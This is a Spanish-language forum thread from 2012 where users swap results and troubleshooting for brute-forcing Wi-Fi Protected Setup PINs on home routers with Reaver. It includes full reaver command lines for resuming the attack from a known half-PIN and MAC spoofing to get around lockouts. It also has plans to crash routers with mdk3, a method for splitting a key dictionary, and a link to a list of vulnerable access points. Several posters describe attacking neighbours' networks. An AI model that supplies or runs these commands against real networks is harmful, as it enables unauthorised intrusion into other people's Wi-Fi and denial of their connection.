¿Me sigueís la corriente?
¿Y si conseguimos hacer crashear el AP y que cuando vuelve a funcionar reactiva el WPS?
Por probar...

Eso debería de comprobarlo alguien que sea poseedor de un Orange-xxxx. Aún que fuese posible, tener que usar semejante método cada cinco o diez pins probados, lo considero poco ortodoxo y no factible. 

De todas formas, creo que en algunos routers, no sólo hay que resetear manualmente el WPS, sino que hay que generar un pin nuevo.

[time]Enero 19, 2012, 02:02:11 am[/time]
En reaver 1.4 empieza el ataque con ese pin por defecto.

Eso es así en la v1.4 hasta la r96, creo recordar. Actualmente estoy utilizando la r103 y eso ya no es así. Quizá fuese una casualidad.
Edito: Acabo de probar la r106 y vuelve a ser como antes: 12345670
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 19, 2012, 03:38:08 am
De acuerdo que no es muy fino  pero  aun  siendo  así  es  mas  factible  que  un  brute  force del Passwpa. ;D
Que pasa después de una hora de juego reaver+aireplay-ng+mdk3+wpa.cli con dos tres adaptadores mareando la bestia?
Quien sabe.. quisas el routeur se rinde del todo y se deja reavear.
También se habría de probar con un delay entre los PINS mas grandes o por ejemplo algo muy factible, ya que funciona el cambio de mac, ver si cambiando de mac cada tantos y aumentando el tiempo entre cada PIN conseguimos burlar el blockeo de un routeur orange_XXXX
Si alguien tiene un routeur de estos con WPS activado por defecto y que le apetece y tiene tiempo, que habré un hilo en el foro llinux rollo "WPS reaver vs Orange_XXX" y le ayudaremos para el usdo de mdk3 o lo que sea, lo que se pueda... :P
Yo tengo la convicción que se puede hacer mucho mas con el brute-force del PIN WPS.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: elkandy25 en Enero 19, 2012, 17:20:08 pm
yo cojo dos orange esta noche pruebo ha ver que pasa
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 19, 2012, 17:54:39 pm
Andaré cerca  :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 19, 2012, 18:20:46 pm
Buenas..

Citar
yo cojo dos orange esta noche pruebo ha ver que pasa

Tampoco es cuestión de "desmadrarse", no quiero que este hilo se salga por la tangente.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juakyconguero en Enero 19, 2012, 18:22:44 pm
Buenas y enhorabuena por el aporte, pero una vez que consigo el pin como me conecto?¿donde pongo el pin en la casilla del pass wpa? ahora mismo estoy utilizando Win Xp.
gracias . 8)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 19, 2012, 19:22:14 pm
+1  maripuri, no había visto el "detalle".  ::)


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: fugax en Enero 19, 2012, 21:11:32 pm
Yo he conseguido el pin en 1 hora y media mas o menos  , la cosa es que ha pasado del 1,96% al 90% ,  una vez que ha encontrado los primeros 4 numeros salta a 90%.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: firpo en Enero 19, 2012, 21:38:05 pm
Yo he conseguido el pin en 1 hora y media mas o menos...

Pues ¡norabuena! Si quieres colaborar compartiendo los datos por aqui, hazlo de una forma adecuada. A modo de ejemplo, fíjate en el post #106 de este hilo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juanpaqui en Enero 20, 2012, 18:31:23 pm
Hola y saludos a todos, yo estoy utilizando la version de reaver 1.4 targeta alfa 1w realtek 8187L y cuando llega al 99.99% probando pines se cuelga y se queda ahí , que puede pasar, alguna solución,,,,, gracias a todos,,,,,,por el gran foro,,,,,
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Enero 21, 2012, 11:14:40 am
Cita de: juanpaqui
Hola y saludos a todos, yo estoy utilizando la version de reaver 1.4 targeta alfa 1w realtek 8187L y cuando llega al 99.99% probando pines se cuelga y se queda ahí , que puede pasar, alguna solución,,,,, gracias a todos,,,,,,por el gran foro,,,,,

En la pagina de reaver-wps recuerdo que estaban discutiendo ese error, seguramente lo resuelvan el alguna revisión. Solo cabe esperar...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juanpaqui en Enero 21, 2012, 11:48:43 am
Saludos, gracias pompiro he instalado la version de reaver 1.3 y esa no falla ok, saludos, esperaremos a una nueva version aunque la 1.3 va bien, las nuevas que salgan mejoraran porsupesto,,,,gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: salvarito en Enero 21, 2012, 12:25:22 pm
Una duda que tengo.
Cuando comienzo el ataque por ejemplo a un router Orange-XXXX al poco de comenzar me da el error 0x4 supongo que al detectar el router que se esta cometiendo un ataque.
Pero mi pregunta es si hay alguna manera de continuar ya sea cambiando la mac o la unica forma es resetara el router.

y otra cosa, no me llevo bien con macchanger, alguien tiene el enlace de macchanger-gui que me parece mas intuitivo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 21, 2012, 13:08:39 pm
Salavarito; ¡Mac changer era para la edad medieval! Ya no se usan estas cosas  ;D
para cambiar tu dirección mac
Código: [Seleccionar]
ifconfig inteface hw ether mac_falsa Estamos impacientes de saber si consigues desbloquear el bloqueo WPS.... ¡Suerte!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: jakob20 en Enero 21, 2012, 20:20:00 pm
Hombre un amigo tiene una Orange-XXXX vamos que la puedo tener cerquita cerquita, puedo probar esta semana y si queréis abro el post y os comento y probamos todo lo que me digáis, pero me tenéis que dar un par de días que estoy estudiando...
Lo que si os puedo decir que probé una Ono no me acuerdo que tipo de ono, y me acuerdo que lo dejé un par de horas e iba por un 2% o así y lo quité, vaaa era sólo para probar, no me esmeré mucho XD

Voy a ver, si me puedo escapar mñn sobre la hora de cenar y lo vemos ¿ok?

Un saludo!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juanpaqui en Enero 22, 2012, 12:10:56 pm
Hola, saludos, alguien sabe que tal la otra aplicación "wpscrack" dicen que es mas rapida,,,,,,, saludosssss
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: larpeiro en Enero 22, 2012, 17:47:55 pm
@Juanpaqui

Como hay un hilo abierto sobre el wpscrack, te comento mis experiencias en el.

Saludos.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 22, 2012, 19:34:19 pm
Mis experiencias con Reaver 1.4 Rev 109.

Adaptador: Alfa 8187L 1W
Red: FTE-XXXX    CC:96:A0:XX:XX:XX
Resultado: Llega al 90% en escasos segundos, despues de 45 minutos lleva a 99,99%y ahi se queda continuamente, os dejo una imagen:
(http://img703..us/img703/7303/99reaver.png)

==========================

Adaptador: Alfa 8187L 1W
Red: FTE-XXXX   6C:2E:85:XX:XX:XX
Resultado: Se queda parado tal como os muestro a continuacion:

Código: [Seleccionar]
[+] Switching wlan0 to channel 1
[+] Waiting for beacon from 6C:2E:85:87:31:91
[+] Associated with 6C:2E:85:XX:XX:XX (ESSID: FTE-XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

decir que ambos me dan como compatible en el WASH.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 22, 2012, 20:35:26 pm
Repasa el hilo en búsqueda de los posts de possie69 (o puedes dirigirte a su perfil y mirar los mensajes que publicó), si no me recuerdo mal reporta que al pasar a reaver 1,4 su RTL8187l  no ha conseguido llave pero que la había obtenido con rtl8187l + reaver anteriores...
A malas empieza una nueva sesión desde el M6 usando el argumento -p 1234xxxx a ver si va mejor....


@ Jacob20
Entendemos nos bien: No es "tener la cercita" es tener la entre manos.
 Vamos a joder la conexión durante los ataques de mdk3, necesitaremos resetear a mano la box etc... Hágalo un dìa que tu amigo no usa Internet, nos está haciendo un gran favor  ;) 
Hablamos por MP  ;)
hasta luego.


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 22, 2012, 22:05:10 pm
gracias kcdtv. sabeis si es posible meterle a reaver 4 digitos que sabes para que busque solo los otros 4? me explico:

El reaver 1.4 supuestamente habia sacado los 4 primeros digitos, pero como he comentado no termina con mi 8187L. Por eso he instalado la 1.3, pero no me permite continuar la sesion anterior que paré al 90%, que es donde ya tiene los 4 primeros digitos.

Por eso, para evitar tantas horas, no se si reaver me permite facilitarle esos digitos. Aircrack si te permite esa opcion
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 22, 2012, 23:59:09 pm
Código: [Seleccionar]
sudo reaver -i mon0 -b mac_du_routeur -p 12349982 -vvo si usas backtrack no necesitas el "sudo"
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 23, 2012, 08:56:45 am
Código: [Seleccionar]
sudo reaver .i mon0 -b mac_du_routeur -p 12349982 -vvo si usas backtrack no necesitas el "sudo"

pero eso es para probar el contraseña completa. Yo quiero acilitarle al reaver los 4 primeros digitos solamente
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: nico9999 en Enero 23, 2012, 09:17:23 am
hola pues lo pones asi     reaver -i mon0 -b mac - c canal -e essid -p 1234 -vv pones los primeros 4 y ya
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Enero 23, 2012, 13:36:38 pm
se livero la version de reaver 1.4 alguien sabe los pasos a seguir desde un comando consola para  instalarlo gracias

Enero 23, 2012, 13:48:22 pm
http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=    esta es la pagina saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 23, 2012, 14:08:55 pm
Los que usan linux te lo explicarán mejor.. no obstante en la carpeta docs tienes un archivo llamado README que dice como hacerlo.

[img width=500 height=205]http://img259..us/img259/6247/capturagw.jpg[/img]

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 23, 2012, 15:40:44 pm
hola pues lo pones asi     reaver -i mon0 -b mac - c canal -e essid -p 1234 -vv pones los primeros 4 y ya

no funciona bien, se queda probando siempre el mismo numero, aunque el porcentaje aumenta.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 23, 2012, 15:58:34 pm
Pon el comando que te he puesto, da igual si es 12340000 0 12349876 o lo que quieres, lo importante es el primer bloque para obtener el M6 enseguida y empezar el ataque a 90%.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sniper1990 en Enero 24, 2012, 16:16:40 pm
Buenas  a todos eh provado con las siguientes redes que tengo a mi alcance(Nota:Son los vecinos de mi bloque,Solo por puro experimento y auditoria wifi)
Resultados con wifiw*ay y con reaver WPS v1.4 "targeta inalambrica Realtek RTL8188CE (usa el driver rtl8192ce en linux)"
Protegido contra logueos de pins llevados poco tiempo:
00:19:70:XX:XX:XX Orange-41xx
00:19:70:XX:XX:XX Orange-6cxx
Posibles candidatos a la vulnerabilidad WPS.(Se me asocia con la red envia pins en forma de bucle;siempre probando pin 12345670)Salta WPS transaction failed. WARNING:Last message not processed properly,reverting state to previous message....
64:68:0C:XX:XX:XX WLAN_3BXX - router marca Broadcom configuracion de fabrica.
Aver si teneis idea de  que es eso de Wifi Protected Setup Configured 0x02 me pica la curiosidad
(http://img19..us/img19/7753/inst.png)
Saludos! ;D
PD:Para escanear redes vulnerables con walsh tienen que tener puesto en marcha el airodump a la vez y les ira el scaneador wps  ::)



Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: faustinpower en Enero 25, 2012, 16:09:30 pm
Saludos. Mi experiencia con reaver:
CD Backtrack 4 y CD Backtrack 5
Tarjeta wifi interna con driver Realtek 8187b (windows)
Bactrack 4 reconoce---------chipset RTL8187
Backtrack 5  reconoce-------chipset RTL8187bve
Con Bactrack 4 consigo más señal y funciona mejor. El resultado obetnido:
 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sniper1990 en Enero 25, 2012, 17:05:17 pm
Version del reaver?se dice que si el 1.4 no te va bien el 1.3 puede que te vaya con esa red,dependera tambien del chipset usado....

Saludos!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mak74 en Enero 25, 2012, 17:07:39 pm
Hola faustinpower,

Yo antes de nada, verificaria si realmente tiene wps activado, con la herramienta walsh ..no sea que este desactivado y por eso no pueda probar ningun PIN, si la señal es buena..

Que versión de reaver has utilizado la 1.4 ? Si es así probaría tambien con la versión 1.3 ya que parece que hay alguna incidencia con la 1.4 en la cual no prueba ningun Pin.. Incidencia 175.

Salu2



Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: faustinpower en Enero 25, 2012, 17:27:55 pm
Si, he probado con  las dos versiones y ambas ofrecen el mismo resultado  :'(
Con wash -i mon0 me detecta router con wps version 1.1   wps locked: N   :o
Gracias de todas formas. No sé que pueda pasar.
Saludos. :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mkway en Enero 26, 2012, 09:43:22 am
buenos dias  en mi zona tenia dos de ono con wps y de repente le han quitado el wps . mi pregunta es q lan cambiado los de ono o los mismos usuarios de los ruters
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 26, 2012, 19:04:48 pm
Lista de AP vulnerables
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sniper1990 en Enero 26, 2012, 20:22:51 pm
Gracias por el link,esto quien lo pone alguien en particular o los propios usuarios??
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: morenazz0 en Enero 26, 2012, 23:31:05 pm
he probado la JAZZTEL_XXXX   38:72:C0 (es mia de mi casa) y la ha sacado sin pegas, teniendo cambiada la contraseña q viene x defecto y todo... lo unico, q no viene activado por defecto el WPS...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: larpeiro en Enero 27, 2012, 00:20:24 am
wpsig.py

Escaner hecho en python para descubrir routers y punto de acceso con WPS activado.
una posible alternativa a wash.

Saludos.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 27, 2012, 12:13:12 pm
¿Has conseguido hacerlo funcionar?
Yo no...  :'(
@ snipper1990
Si mirras al final de la lista, explican quien hace eso y como participar si tienes un routeur queno esta en la lista  ;)
@ morenazz0
Estamos intentando averiguar si hay PIN WPS comunes a modelos de routeurs: http://lampiweb.com/foro/index.php?topic=8188.0
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Enero 31, 2012, 12:22:07 pm
Ya lo pone kcdtv, pero os pongo el link a los que vais a piñón fijo con los post para que echéis un cable al igual que se os ha echado a vosotros con tutos y demás info...

Patrones de PINs para WPA

Saludos a tod@s
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: norgren en Enero 31, 2012, 12:50:28 pm
Buenas  a todos eh provado con las siguientes redes que tengo a mi alcance(Nota:Son los vecinos de mi bloque,Solo por puro experimento y auditoria wifi)
Resultados con wifiw*ay y con reaver WPS v1.4 "targeta inalambrica Realtek RTL8188CE (usa el driver rtl8192ce en linux)"
Protegido contra logueos de pins llevados poco tiempo:
00:19:70:XX:XX:XX Orange-41xx
00:19:70:XX:XX:XX Orange-6cxx
Posibles candidatos a la vulnerabilidad WPS.(Se me asocia con la red envia pins en forma de bucle;siempre probando pin 12345670)Salta WPS transaction failed. WARNING:Last message not processed properly,reverting state to previous message....
64:68:0C:XX:XX:XX WLAN_3BXX - router marca Broadcom configuracion de fabrica.
Aver si teneis idea de  que es eso de Wifi Protected Setup Configured 0x02 me pica la curiosidad
(http://img19..us/img19/7753/inst.png)
Saludos! ;D
PD:Para escanear redes vulnerables con walsh tienen que tener puesto en marcha el airodump a la vez y les ira el scaneador wps  ::)

Wifi Protected Setup Configured 0x02 =wps activado.Salu2.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: nico9999 en Febrero 01, 2012, 18:27:17 pm
hola a todos hoy e probado una de ono con mac e0:69:95 de 6 numeros y me da este error .wps transaction failed (code :0x02) re-trying last pin estoy usando reaver 1.4 +rtl8187 que puede ser gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 02, 2012, 01:06:53 am
Un problema de distancia, o de obstáculos, o de interferencias.
La reacción cambia también mucho de un routeur a otros y todos los adaptadores no son iguales...
En tu caso no te preocupes  que con el rtl8187l tienes de lo mejorcito con Reaver.
Lo primero que deberías hacer es ver cual es el modelo de tu routeur y echarle ojo a la base de datos que puse antes; para ver si sale.
Por otro lado, si no me equivoco, no he visto ningunos datos serios reportando de un ataque conseguido sobre ONOXXXXXX. ¿O si? Ya no me acuerdo  :P, busca bien por el foro...
Insisto en las condiciones de recepción, para unos routeurs tienen que ser excelentes, bien mejores a las que se necesitan para llevar acabo, por ejemplo, una re-inyección de paquetes ARP.
¡Suerte!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: faustinpower en Febrero 02, 2012, 10:00:53 am
Hola.
Pués según todo lo expuesto, con un driver rtl8187 en bactrack4, un router mac 00:19:15 y con una señal wifi del 100% (en windows) y -33 (en linux) debería haber tenido un exíto rotundo al reunirse todos los requisitos, en cambio la realidad es bien distinta:
Sending EAPOL request
Recive timeout ocurred
Sending EAPOL request
Recive timeout ocurred
.................................
WPS transaction failed (code 0x02) Retrying last ping 12345670
Y así sucesivamente!
Probado con reaver 1.3 , 1.4 , etc.
Probado con Bactrack5 (con peores resultados al detectar chipset RTL8187BvE)
Y para colmo tampoco funciona con la NEWGUI`WLANJAZZTEL
En fin, al menos me consuelo..............
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Febrero 02, 2012, 11:01:01 am
yo tambien estoy de malas con mi 8187L. Ni con 1.3, ni con 1.4 consigo nada
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kiki_c8 en Febrero 02, 2012, 12:54:47 pm
Hola.
Pués según todo lo expuesto, con un driver rtl8187 en bactrack4, un router mac 00:19:15 y con una señal wifi del 100% (en windows) y -33 (en linux) debería haber tenido un exíto rotundo al reunirse todos los requisitos, en cambio la realidad es bien distinta:
Sending EAPOL request
Recive timeout ocurred
Sending EAPOL request
Recive timeout ocurred
.................................
WPS transaction failed (code 0x02) Retrying last ping 12345670
Y así sucesivamente!
Probado con reaver 1.3 , 1.4 , etc.
Probado con Bactrack5 (con peores resultados al detectar chipset RTL8187BvE)
Y para colmo tampoco funciona con la NEWGUI`WLANJAZZTEL
En fin, al menos me consuelo..............

Me pasa exactamente lo mismo con un router 00:19:15, no he probado con WLANJAZZTEL GUI pues no consigo capturar el handshake pero dices que ni con ese se puede, ¿estoy en lo cierto? si es así, han cambiado entonces el patrón de las 00:19:15 de nuevo y los nuevos routers ya son invulnerables a los dos métodos, a ver si alguien lo confirma.

Otra cosa, ¿cómo se usa el mdk3 para intentar capturar el handshake?

Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Febrero 02, 2012, 17:36:18 pm
@kiki_c8

Es muy aventurado decir que se haya cambiado un patrón sin datos en la mano que lo confirme. Mas si te basas en lo   dice faustinpower quien no especifica si es poseedor de ellos cuando dice lo siguiente:

@faustinpower

Citar
Y para colmo tampoco funciona con la NEWGUI`WLANJAZZTEL
Para el patrón (vamos a llamarlo conocido por dejar abiertas también todas las posibilidades) de las WLAN_XXXX  con BSSID 00:19:15 el programa que genera el diccionario a través de la GUI crea TODAS las posibilidades.. por tanto una de dos: O es cierto que se ha cambiado el patrón (algo que dudo enormemente) o la contraseña no es la que trae por defecto, a mi juicio lo mas probable.

Esto es bien fácil de conocer, si faustinpower nos proporciona por MP los datos del router y de esa forma tod@s salimos de dudas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carrasco30 en Febrero 02, 2012, 18:46:14 pm
esta mañano estado haciendo una puebra con mi ruter k es ono y le metido el pin k llevava y greo k es por defesto por k yo no la el tocado y ma dado mi clave esto es
metgear residential CG3100D-RG
ONOXXXX
MAC-30:46:9A
PIN-9754XXXX
Este era el pin k llevava


Febrero 02, 2012, 18:49:35 pm
ah k seme orvidaba luego e desativado el pin y cuando lo e vusto a astivar y me saria otra clave destinta
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 02, 2012, 22:10:48 pm
Con los seis primeros digitos de la mac identificas el fabricante, pero no el modelo exacto. Y si mires en el hilo sobre los patrones, veras que de momento parece que va con el modelo del routeur ( o a lo mejor con el firmware, también podría ser el serial). En todo casos los 6 primeros digitos de la bssid no bastan.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dj-van en Febrero 04, 2012, 23:47:25 pm


 Por desgracia a mí me pasa lo mismo que a vosotros. He utilizado el reaver con alguna red 00:19:15 WLAN_XXXX,
y no me tira por ningún lado.

 Uso el reaver 1.3, 1.4 r62, 1.4 r102 y utilizo la Alfa (alcance b-g).

 Entonces lanzo la siguiente custión:

 Como la mayoría de estas redes trabajan en el rango N, ¿es posible que deba utilizar un adaptador Alfa tipo b-g-n de 2 W, para que funcione todo?.

 He leído todo el hilo, pero no he visto con que tipo de adaptador lo conseguís (los pocos que lo habéis hecho) satisfactoriamente.

 Empiezo a pensar que este programa tiene muchos bugs que hay que depurar, o es que los routers 00:19:15 de WLAN no son tan sencillos como los pintan.

 Si alguien puede aclararme ésto, se lo agradeceré. A lo mejor con mi Alfa b-g estoy dando palos de ciego.

 Evidentemente, uso el chipset soportado RTL8187L.

 Saludoschau.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Febrero 05, 2012, 10:16:54 am
ayer mismo saque una FTE-XXXX con mi alfa 8187L, Reaver 1.3. Con la 1.4 no he podido. He tardado semanas por que el router bloqueaba el WPS, aunque wash decia que no estaba bloqueado.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: faustinpower en Febrero 05, 2012, 10:46:24 am

 Por desgracia a mí me pasa lo mismo que a vosotros. He utilizado el reaver con alguna red 00:19:15 WLAN_XXXX,
y no me tira por ningún lado.

 Uso el reaver 1.3, 1.4 r62, 1.4 r102 y utilizo la Alfa (alcance b-g).

 Entonces lanzo la siguiente custión:

 Como la mayoría de estas redes trabajan en el rango N, ¿es posible que deba utilizar un adaptador Alfa tipo b-g-n de 2 W, para que funcione todo?.

 He leído todo el hilo, pero no he visto con que tipo de adaptador lo conseguís (los pocos que lo habéis hecho) satisfactoriamente.

 Empiezo a pensar que este programa tiene muchos bugs que hay que depurar, o es que los routers 00:19:15 de WLAN no son tan sencillos como los pintan.

 Si alguien puede aclararme ésto, se lo agradeceré. A lo mejor con mi Alfa b-g estoy dando palos de ciego.

 Evidentemente, uso el chipset soportado RTL8187L.

 Saludoschau.

Pues lo mismo me ocurre a mi con una 00:19:15 también con Bactrack 4 (reconoce chipset RTL8187 y drivers rlt8187), hice una distro BT5 pensando que el 4 no estaba preparado para reaver y me encontré que me reconocia otro chipset: RTL8187BvE que funcionaba peor que con BT4. He probado a sustituir los drivers, he probado todos los reavers, todos los comandos (-a, -A, -D, -L, .....etc.) y siempre el mismo resultado para mi desesperación, porque en teoría tengo todo lo mejor de lo mejor para hacerlo funionar con el mejor de los resultados: Router 00:19:15 con pin conocido que ofrece los resultados esperados en segundos; drivers rtl8187; proximidad máxima al router; wash confirma lo anteiror,......) Si alguien quisiera analizar una captura no tendría inconveniente en ofrecerla.
Saludos y gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Febrero 05, 2012, 13:39:25 pm
Yo tampoco he podido sacarlo con reaver el router 00:19:15. Un tema a considerar: Si utilizáis rtl8187 reaver funcionará con cualquier distribución linux ya que el drivers rtl8187 se puede poner en modo monitor, si utilizáis RT3070 debéis utilizar Backtrack ya que elige el driver RT2800 que sirve para auditar pero no para navegar. Si utilizáis RT3070 en Ubuntu por ejemplo y hacéis iwconfig veréis que ha elegido RT2870, que es lo correcto ya que es el driver para navegar pero NO para auditar.

Ahora estoy pasando el diccionario poco a poco en el curro, un truco para partir el diccionario. Vamos a engañar un poco a new GUI`WLANJAZZTEL  ;D. Una vez tenéis el handshake lo metéis en la carpeta de WlanJazztel y este genera el diccionario, son unas 120 megas, creo que tiene este nombre WLAN_001915.lst . Copias este archivo y lo pegáis en un pendrive. Entramos en Linux (da igual que sea LiveCD o instalado). En la consola os ubicáis donde tenéis en archivo, verificas con el comando ls que está ahí. Ejecutas el siguiente comando:

Citar
split -b 20M WLAN_001915.lst

Te creará unos archivos de 20 megas con nombres de este estilo:  aa, ab, ac.

Los metes en el pendrive, los pasas a windows y los vas metiendo uno a uno en la carpeta de new WLANJAZZTEL, RENOMBRALOS como WLAN_001915.lst y automáticamente te lo reconoce. Por ejemplo metes el aa, le cambias el nombre y ejecutas new WLANJAZZTELXXXX 'GUI.exe. Si ese no vale eliminas el archivo WLAN_001915.lst, metes el ab, lo renombras...y así sucesivamente. Ten control de cuales has pasado o cuales nop. Saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Febrero 05, 2012, 14:53:03 pm
El peso exacto del diccionario WLAN_001915.lst es de 214.844 KB.

Lo comento porque no vaya a ser que alguno al tratar de usarlo fuera de la GUI no lo copie bien y no esté completo

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sniper1990 en Febrero 05, 2012, 15:53:03 pm
Hola.
Pués según todo lo expuesto, con un driver rtl8187 en bactrack4, un router mac 00:19:15 y con una señal wifi del 100% (en windows) y -33 (en linux) debería haber tenido un exíto rotundo al reunirse todos los requisitos, en cambio la realidad es bien distinta:
Sending EAPOL request
Recive timeout ocurred
Sending EAPOL request
Recive timeout ocurred
.................................
WPS transaction failed (code 0x02) Retrying last ping 12345670
Y así sucesivamente!
Probado con reaver 1.3 , 1.4 , etc.
Probado con Bactrack5 (con peores resultados al detectar chipset RTL8187BvE)
Y para colmo tampoco funciona con la NEWGUI`WLANJAZZTEL
En fin, al menos me consuelo..............
Prueba alguno de los comandos extra.Prueba estos ejemplo"-b 00:11:22:44:55:66 -w -L -S -vv" o tambien "-b 00:11:22:44:55:66 -N -L -S -vv"
Saludos!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: faustinpower en Febrero 05, 2012, 16:46:26 pm
Gracias sniper1990 x probar no quedará.

Por cierto, aprovechando que este subforo es de linux, alguien me podría aclarar (más que nada para descartar) si una tarjeta wireless interna Realtek rtl8187b la cual es detectada en Backtrack 4 con chipset RTL8187 y driver rtl8187 necesita algún parche ? He leido mucho en este y otros foros pero no me queda nada claro. He descargado los drivers que aparecen en aircrack.org para rtl8187 pero no ha habido mejoras (no se si es que no los he instalado bien con - make y despues - make install o es que no son necesarios pues la tarjeta entra en modo monitor. ¿Se pueden instalar aunque sea un CDLive?.
Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 06, 2012, 05:53:20 am
¿Y porque no aprovechas el subforo para abrir un tema sobre el rtl8187l y backtrack4?
Aquí el tíutlo pone "Vulnerabilidad en Wi-Fi Protected Setup (WPS)", intentar no desviar los temas plizzzzzzzzzz.
Entonces abres otro tema y ahí te respondemos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Febrero 09, 2012, 16:15:23 pm
¿alguien sabe como conectarse a una red que cambia constantemente de clave?He sacado la contraseña con reaver y cada vez que pruebo con el pin me da una clave diferente y no me deja conectarme con ninguna de las que saca.Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: managuas en Febrero 09, 2012, 21:28:28 pm
¿alguien sabe como conectarse a una red que cambia constantemente de clave?He sacado la contraseña con reaver y cada vez que pruebo con el pin me da una clave diferente y no me deja conectarme con ninguna de las que saca.Gracias.
carasucia te gusta jugar a buen entendedor.jaja....
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Febrero 11, 2012, 12:33:01 pm
Citar
Lo que me gustaria seria que alguien me dijera si es posible conectarse a una red con ese tipo de encriptacion y si no se puede que me explicara porque(la red es de mi vecino y tengo permiso para intentarlo)

Febrero 11, 2012, 12:38:08 pm
Managuas
Citar
carasucia te gusta jugar a buen entendedor.jaja....



Lo que me gustaria seria que alguien me dijera si es posible conectarse a una red con ese tipo de encriptacion y si no se puede que me explicara porque(la red es de mi vecino y tengo permiso para intentarlo)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 11, 2012, 16:06:48 pm
WPS reaver te permite averiguar la llave WPA mediante brute force del PIN WPS.
Si tu vecino cambia su llave WPA tienes que cambiar tu también la llave para conectarte.
Habla con el para que te comunique la nueva llave cuando la cambia.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
